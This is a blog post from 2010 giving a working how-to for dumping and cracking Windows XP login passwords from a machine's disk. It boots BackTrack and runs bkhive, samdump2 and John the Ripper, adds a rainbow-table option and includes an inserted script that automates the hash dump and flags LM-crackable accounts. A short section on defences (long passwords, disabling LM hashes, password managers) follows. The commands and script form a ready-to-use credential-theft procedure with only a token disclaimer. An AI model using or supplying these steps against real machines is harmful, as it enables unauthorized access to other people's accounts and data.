Saturday, January 2, 2010

How to hack passwords in Windows XP?

Warning!
The techniques explained here can be used for extremely nasty things. Opentechlab does not recommend them. Use everything at your own risk. Opentechlab also gives some tips below on how to protect yourself against password cracking.

What follows will be uncomfortable for some people: a guide to recovering the login passwords of Windows XP from the disk. It also explains how to protect against this and keep your PC as safe as possible from crackers. Opentechlab does not crack, it only hacks!

Password hacking using BackTrack
First download the following:

Backtrack 3 Final (BT4 is also available, but I suggest BT3)

BT3 is an open-source Linux live distribution. It is essentially Slax plus a collection of hacking and network-security tools. Since Slax uses the lzm module mechanism, it is easy to add and remove the modules we need. You can download it as a bootable ISO image or as a USB pen drive installer. I downloaded the ISO, wrote it to a CD and everything went perfectly. Nothing is installed on the hard disk: you simply boot the PC from the CD-ROM. Within minutes the Linux kernel loads and the BackTrack desktop appears. Then run the following commands in a terminal:

bkhive /mnt/hda1/WINDOWS/system32/config/SYSTEM key

(this extracts the boot key from the SYSTEM hive and saves it in the file 'key'; the hashes in the SAM are encrypted with that key, so samdump2 needs it)

samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key
samdump2 /mnt/hda1/WINDOWS/system32/config/SAM key > ~/Desktop/password.txt
john ~/Desktop/password.txt -users=Administrator

The first samdump2 command prints the decrypted hashes on the screen, the second saves them to password.txt, and john then prints the cracked password next to the user name.

Here it is assumed that hda1 is the C: drive (where Windows XP is installed) and that BT3 has mounted it under /mnt/hda1. If not, replace it with the actual device. password.txt contains one line per user in pwdump format (user:RID:LM hash:NT hash:::). The passwords in it are not readable: they are hashed, and a hash cannot be reversed. What john does instead is try candidate passwords (wordlists first, then brute force), hash each candidate the same way Windows does and report the one whose hash matches. On XP this is usually quick because, for passwords shorter than 15 characters, Windows stores the old LM hash next to the NT hash; LM uppercases the password and splits it into two 7-character halves, and john cracks each half separately.
john ~/Desktop/password.txt -users=Administrator
only gives the password of Administrator. To get the password of another user, type:
john ~/Desktop/password.txt -users=username
You can simply run:
john ~/Desktop/password.txt
to get the passwords of all users, but it takes longer. Knowing what you want is far more efficient than knowing everything, and it will not eat up your time. Sometimes, if the password is complex, you get enough leisure time for a cup of coffee!
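The procedure above as one script, an added example that is not from the original post or from the BackTrack project. It assumes the BT3 tool syntax (bkhive SYSTEM keyfile, samdump2 SAM keyfile, john) and that the XP volume is /dev/hda1, mounts the volume read-only, and adds the check a practitioner wants before starting john: which accounts in the dump still carry an LM hash (cracked in minutes) and which have only an NT hash, which is what the 15-character rule in the prevention section below produces. The sample dump lines are constructed; the Administrator line carries the widely published LM and NT hashes of the password 'password', the other hash values are illustrative.

```sh
#!/bin/sh
# Added example, not part of the original post or of BackTrack: wraps the
# bkhive / samdump2 / john steps and reports which accounts still carry an LM hash.
# Assumptions: BackTrack 3 tool syntax (bkhive SYSTEM keyfile; samdump2 SAM keyfile),
# XP volume on /dev/hda1. Newer samdump2 (3.x) takes "samdump2 SYSTEM SAM" instead.

EMPTY_LM=aad3b435b51404eeaad3b435b51404ee   # LM field when no LM hash is stored
EMPTY_NT=31d6cfe0d16ae931b73c59d7e0c089c0   # NT hash of the empty password

# Constructed sample in pwdump format (user:RID:LM:NT:::). The Administrator line
# uses the well-known hashes of "password"; the other hash values are illustrative.
SAMPLE_DUMP='Administrator:500:e52cac67419a9a224a3b108f3fa6cb6d:8846f7eaee8fb117ad06bdd830b7586c:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
alice:1003:aad3b435b51404eeaad3b435b51404ee:5835048ce94ad0564e29a924a03510ef:::'

# Dump the SAM of an XP volume. $1 = device (e.g. /dev/hda1), $2 = output file.
# The volume is mounted read-only so nothing on the target disk is modified.
dump_xp_hashes() {
    mnt=/mnt/xp
    mkdir -p "$mnt"
    mount -o ro "$1" "$mnt" || return 1
    cfg="$mnt/WINDOWS/system32/config"
    bkhive "$cfg/SYSTEM" /tmp/bootkey || { umount "$mnt"; return 1; }
    samdump2 "$cfg/SAM" /tmp/bootkey > "$2" || { umount "$mnt"; return 1; }
    umount "$mnt"
}

# Classify one pwdump line. Prints "<user> <state>" where state is
#   lm+nt          LM hash stored: two 7-char uppercase halves, cracked quickly
#   nt-only        no LM hash (password of 15+ chars or NoLMHash policy)
#   empty-password NT hash of "": no password set at all
classify_line() {
    user=$(printf '%s' "$1" | cut -d: -f1)
    lm=$(printf '%s' "$1" | cut -d: -f3 | tr 'A-Z' 'a-z')
    nt=$(printf '%s' "$1" | cut -d: -f4 | tr 'A-Z' 'a-z')
    if [ "$nt" = "$EMPTY_NT" ]; then
        state=empty-password
    elif [ "$lm" = "$EMPTY_LM" ]; then
        state=nt-only
    else
        state=lm+nt
    fi
    printf '%s %s\n' "$user" "$state"
}

# Classify every non-empty line read from stdin (a samdump2 output file).
classify_dump() {
    while IFS= read -r line; do
        if [ -n "$line" ]; then
            classify_line "$line"
        fi
    done
}

# Crack one user as the post does. john recognises the LM hashes in pwdump
# input by itself; NT-only accounts need a john build with NT hash support.
crack_user() {   # $1 = dump file, $2 = user name
    john --users="$2" "$1"
    john --show "$1"
}

# ./script.sh --demo classifies the constructed sample without touching any disk;
# ./script.sh --dump runs the real procedure against /dev/hda1.
case "${1-}" in
    --demo) printf '%s\n' "$SAMPLE_DUMP" | classify_dump ;;
    --dump) dump_xp_hashes /dev/hda1 "$HOME/Desktop/password.txt" \
              && classify_dump < "$HOME/Desktop/password.txt" ;;
esac
```

Run classify_dump on the real password.txt before john: an account reported as lm+nt will fall in minutes whatever the password looks like, while an nt-only account is where password length and complexity actually start to matter.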

How to use rainbow tables in BackTrack?
You can also use rainbow tables to crack the hashes. Plenty of tables can be downloaded from freerainbowtables. Downloading all of them to your hard disk is not practical (more than 1000 GB!), so download a few small tables to experiment with. To use them, BT3 provides a program called 'rainbowcrack'. It can be accessed from:
Main menu -> Backtrack -> privilege escalation -> All -> Rainbow crack
Note that rainbowcrack only reads tables in *.rt format, while the tables available for free download are mostly *.rti. The solution is to download the *.rti tables and convert them to *.rt with rti2rto.exe. Then use rainbowcrack instead of john; all other steps are the same. Remember that a table only covers the hash type, character set and length it was generated for, so LM tables are useless against an account that has only an NT hash.

Using Ophcrack
Ophcrack is also open source and also useful. I personally have not tried it, but many of my friends use it successfully.

Download Ophcrack
You need to download rainbow tables also.
Read more about rainbow tables

How to prevent password hacking?
Here again, prevention is better than cure. If you care about how secure your data is, secure your passwords first. Do not store your passwords anywhere other than your brain. Typing the password at every login is boring, but be aware of the consequences. That is the general rule; for the Windows login itself it is not possible, because Windows has to store a hash of the password on the disk, and that hash is exactly what the procedure above reads. So the protection lies in what that hash is made of.

Use more than 10 characters for your password, and on XP use at least 15. For each character you add, you can see how much longer BT3 takes to find the password. A password of 15 or more characters has a second effect: Windows no longer stores the weak LM hash for it, only the NT hash, which cannot be split into two halves. (The same can be forced for shorter passwords with the Local Security Policy setting 'Network security: Do not store LAN Manager hash value on next password change'; it takes effect the next time the password is changed.) Add symbols and digits. Cracking a password with symbols and digits is very frustrating: a cracker works for hours on such a computer until he gets the message that the password was not found. Do not use meaningful words. If your password is a sentence such as 'Mary had a little lamb' and someone else's is 'asdfiuerh', the former can still be found with a wordlist of common phrases even though it is much longer; length only helps when the characters are not predictable.

Use different passwords for different internet accounts. If you find it hard to memorise them all, you need a good password manager (I recommend KeePass). Change your passwords periodically. It will save you a lot of trouble. If you have top-secret information that must not be revealed to the world for any reason, I have a good idea, though it is not guaranteed: copy it to a portable device, put the device in a bank locker, throw your computer into a fire and keep watching until it turns to ashes.

1 comment:

Anonymous said...

Principled making my first post at opentechlab.blogspot.com, which seems to be a wonderful forum!